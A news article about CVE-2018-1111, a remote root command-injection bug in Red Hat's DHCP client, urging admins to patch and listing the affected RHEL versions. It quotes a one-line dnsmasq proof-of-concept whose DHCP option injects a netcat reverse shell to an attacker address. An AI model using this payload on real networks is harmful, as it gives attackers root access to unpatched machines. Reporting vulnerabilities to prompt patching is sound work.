Red Hat admin? Get off Twitter and patch this DHCP client bug
Proof-of-concept fits in a Tweet and can take down all of RH's best bits
Red Hat has announced a critical vulnerability in its DHCP client and while it doesn't have a brand name it does have a Tweetable proof-of-concept.
Discovered by Googler Felix Wilhelm, CVE-2018-1111 is a command injection bug in the Red Hat Enterprise Linux and derivative DHCP clients.
Wilhelm Tweeted: “CVE 2018-1111 is a pretty bad DHCP remote root command injection affecting Red Hat derivates: https://access.redhat.com/security/vulnerabilities/3442151 …. Exploit fits in a tweet so you should patch as soon as possible.”
Here, IN a Tweet from Barkın Kılıç, is the PoC:
#CVE-2018-1111 tweetable PoC :) dnsmasq --interface=eth0 --bind-interfaces --except-interface=lo --dhcp-range=10.1.1.1,10.1.1.10,1h --conf-file=/dev/null --dhcp-option=6,10.1.1.1 --dhcp-option=3,10.1.1.1 --dhcp-option="252,x'&nc -e /bin/bash 10.1.1.1 1337 #" cc: @cnbrkbolat pic.twitter.com/vUICm2HluC— Barkın Kılıç (@Barknkilic) May 15, 2018
(The third image in that Tweet shows the attacker accessing the shell as root.) Red Hat explained that “A malicious DHCP server, or an attacker on the local network able to spoof DHCP responses, could use this flaw to execute arbitrary commands with root privileges on systems using NetworkManager and configured to obtain network configuration using the DHCP protocol.”
Here's the full list of affected RHEL versions: Advanced Update Support 6.4; Extended Update Support 7.3; Advanced Update Support 6.6; Red Hat Enterprise Linux 6; Extended Update Support 6.7; Advanced Update Support 7.2; Server TUS (v.6.6); RHEL 7; Extended Update Support 7.4; Virtualization 4 Management Agent for RHEL 7 Hosts; Advanced Update Support 6.5; and Linux Server TUS (v. 7.2).
Red Hat's update services for SAP Solutions on x86 and IBM Power architectures are also affected. ®